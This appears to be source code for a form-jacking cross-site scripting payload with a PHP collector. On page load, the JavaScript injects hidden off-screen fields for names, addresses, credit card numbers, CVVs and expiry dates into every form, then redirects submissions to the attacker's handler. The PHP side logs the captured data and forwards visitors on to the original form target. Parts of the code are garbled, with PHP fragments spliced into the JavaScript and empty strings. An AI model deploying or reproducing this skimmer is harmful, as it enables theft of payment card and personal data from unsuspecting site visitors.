function xssFormJacker(){
// Get all forms on page
forms = document.querySelectorAll('form');
Array.prototype.forEach.call( forms, form => {
fields = form.querySelectorAll('input,select,textarea,button')
// Get list of fields
aFieldList = Array();
Array.prototype.forEach.call( fields, field => {
aFieldList.push( field.name );
});
// Add extra hidden fields
// text fields
'name,email,phone,organization,address,postal,city,county,state,cc_number,cc_cvv'.split(',').forEach(function(name){
if( aFieldList.includes( name ) ){
return;
}
d = document.createElement('div')
d.style = 'left: -500px; position: absolute;'
f = document.createElement('input');
f.type='text';
f.name = name;
d.appendChild( f );
form.appendChild( d );
});
// Select boxes
'country,cc_month,cc_year'.split(',').forEach(function(name){
if( aFieldList.includes( name ) ){
return;
}
d = document.createElement('div')
d.style = 'left: -500px; position: absolute;'
f = document.createElement('select');
f.name = name;
switch( name ){
case 'country':
f.innerHTML = '';
break;
case 'cc_month':
f.innerHTML = '';
break;
case 'cc_year':
$i';\n";
}
?>
break;
}
d.appendChild( f );
form.appendChild( d );
});
// Remember the original fields
f = document.createElement('input')
f.type = 'hidden';
f.name = 'origFieldList';
f.value = aFieldList.join(',');
form.appendChild( f );
// Change the action URL
f = document.createElement('input')
f.type = 'hidden';
f.name = 'origActionUrl';
f.value = form.action;
form.appendChild( f );
form.action = '';
});
}
window.onload = xssFormJacker;
prepare($sql);
$stmt->execute($data);
}else{
file_put_contents( $log_file, print_r( $data, true ), FILE_APPEND );
}
// Build the form
if( !empty( $_REQUEST['origActionUrl'] ) ){
echo "";
echo "\n";
echo "\n";
echo "";
}else{
header( 'Location: https://www.google.com' );
}
}
?>